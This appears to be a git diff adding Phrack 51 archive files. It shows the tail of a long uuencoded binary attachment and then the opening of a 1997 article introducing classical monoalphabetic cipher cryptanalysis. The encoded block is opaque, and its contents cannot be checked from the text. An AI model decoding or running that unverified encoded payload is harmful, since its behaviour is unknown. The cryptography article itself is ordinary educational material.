+MI&?/(U@W!O<^Q^"I)Z=T9[:$OG1"PAY?M8%IP+Y=%<BVI*4*K$(HH[RL7&6A
+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
+"`@#S
+`
+end
+<-->
+
+
+----[  EOF
+
diff --git a/phrack51/13.txt b/phrack51/13.txt
new file mode 100644
index 0000000..264942e
--- /dev/null
+++ b/phrack51/13.txt
@@ -0,0 +1,479 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 13 of 17
+
+
+-------------------------[  Monoalphabetic Cryptanalysis (Cyphers, Part One)
+
+
+--------[  Jeff Thompson aka 'Mythrandir' <jwthomp@cu-online.com>
+
+
+
+Written for Phrack and completed on Sunday, August 31st, 1997.
+
+
+---------
+
+First a quick hello to all of those I met at DefCon this year.  It was 
+incredible fun to finally put faces to many of the people I have been talking 
+with for some time.  It was truly was a treat to meet so many others who are 
+alive with the spirit of discovery.  
+
+----------
+
+
+This is the first in a series of articles on Cryptology that I am writing.  
+The goals of these articles will be to attempt to convey some of the excitement
+and fun of cyphers.  A topic of much discussion in regards to cryptography 
+currently, is about computer based cyphers such as DES, RSA, and the PGP 
+implementation.  I will not be discussing these.  Rather, these articles will 
+cover what I will term classical cryptology.  Or cryptology as it existed 
+before fast number crunching machines came into existance.  These are the sorts
+of cyphers which interested cryptographers throughout time and continue to be 
+found even to this very day.  Even today, companies are producing software 
+whose encryption methods are attackable.  You will find these commonly among 
+password protection schemes for software programs.  Through the course of these
+articles I will explain in practical terms several common cypher types and 
+various implementations of them as well as cryptanalytic techniques for 
+breaking these cyphers.
+
+Creating cyphers is fun and all, but the real excitement and often times tedium
+is found in Cryptanalysis.  Many of the ideas presented in these articles will 
+based on three sources.  The following two books: The Codebreakers by David 
+Kahn (ISBN: 0-684-83130-9) and Decrypted Secrets by F.L. Bauer 
+(ISBN: 3-540-60418-9).  Both authors have put together wonderful books which 
+both cover the history and methods of Cryptology.  Do yourself and the authors 
+a favor and purchase these books.  You will be very pleased with the lot.  
+Finally, a miniscule amount of these articles will be written based on my own 
+personal experience.  
+
+The fun is in the journey and I welcome you on what is certain to be an 
+interesting trip.  Please feel free to raise questions, engage me in 
+discussions, correct me, or simply offer suggestions at jwthomp@cu-online.com.
+Please be patient with me as I am traveling extensively currently, and may be 
+away from the computer at length occasionally.  
+
+Out the door and into the wild...
+
+
+--Monoalphabetic Cyphers
+
+Monoalphabetic cyphers are often currently found in simple cryptograms in books
+and magazines.  These are just simple substitution cyphers.  This does not 
+mean that they are always simple for the beginning amateur to solve.
+
+Three common monoalphabetic cyphers which are used are substitution, cyclical, 
+and keyed cyphers.
+
+
+-Substitution Cyphers 
+
+By taking an alphabet and replacing each letter with another letter in a 
+unique fashion you create a simple monoalphabetic cypher.  
+
